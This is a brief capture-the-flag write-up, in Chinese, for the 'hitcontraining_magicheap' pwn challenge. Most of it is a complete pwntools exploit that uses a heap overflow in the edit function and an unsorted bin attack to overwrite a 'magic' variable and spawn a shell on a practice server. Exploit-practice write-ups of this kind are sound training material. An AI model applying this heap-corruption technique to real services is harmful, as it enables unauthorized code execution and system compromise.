hitcontraining_magicheap
查看保护
magic <= 0x1305即可getshell。
edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 28199)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice :'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Size of Heap : ', str(size))
r.sendlineafter('Content of heap:', content)
def edit(index, size, content):
r.sendlineafter(menu, '2')
r.sendlineafter('Index :', str(index))
r.sendlineafter('Size of Heap : ',str(size))
r.sendlineafter('Content of heap : ', content)
def delete(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Index :', str(index))
add(0x10, 'aaaa')
add(0x80, 'bbbb')
add(0x10, 'cccc')
delete(1)
magic = 0x6020A0
p1 = b'a' * 0x18 + p64(0x91) + p64(0) + p64(magic - 0x10)
edit(0, len(p1), p1)
add(0x80, 'aaaa')
r.sendlineafter(menu, '4869')
r.interactive()